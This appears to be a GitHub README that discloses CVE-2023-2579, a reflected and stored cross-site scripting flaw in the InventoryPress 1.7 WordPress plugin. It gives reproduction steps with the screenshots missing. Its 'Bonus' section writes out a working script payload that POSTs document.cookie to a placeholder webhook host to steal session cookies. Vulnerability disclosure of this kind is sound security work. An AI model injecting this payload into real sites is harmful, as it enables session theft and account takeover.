PoC for CVE-2023-2579# Update - 6-23-2023
The CVE-2023-2579 ID was reserved and the PoC was published in the WPScan website:
https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
# Details
Title: Authenticated Reflected Cross-Site Scripting in InventoryPress Plugin for WordPress CMS</br>
Date: 2023-04-21</br>
Author: Danilo Albuquerque</br>
Vendor Homepage: https://wordpress.org</br>
Software Link: https://wordpress.org/download</br>
Version: WordPress 6.2</br>
Plugin's Name and Version: InventoryPress 1.7</br>
Tested on: Brave (Version 1.50.119 Chromium: 112.0.5615.121 (Official Version) 64 bits)</br>
# PoC for Reflected XSS vulnerability in InventoryPress 1.7
1. Go to the page that you can add the items into the inventory;
2. Add the malicious payload into the "Description" input of the form;
3. Access the new item's link generated by the plugin;
When you do all that and update the current page, it will bring you the alert pop-up with the message in it.
## Screenshots below
1. Go to the page that you can add the items into the inventory:</br>

2. Add the malicious payload into the "Description" input of the form:</br>

3. Access the new item's link generated by the plugin:</br>

4. Once the request is done, the alert pop-up is showed:</br>

# Bonus - PoC for Stored XSS
1. Add the following payload to steal the cookies into the "Description" input: ```<script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>```. Then post the new item, or update an old one;
2. Trigger and get the credentials in the Webhook site
1. Adding the payload and posting the item (or updating it):

2. Triggering and getting the credentials:

[4.0K] /data/pocs/b2e020c33ba34cb1cf111c1c9c7e203ee5d3974b
└── [2.3K] README.md
0 directories, 1 file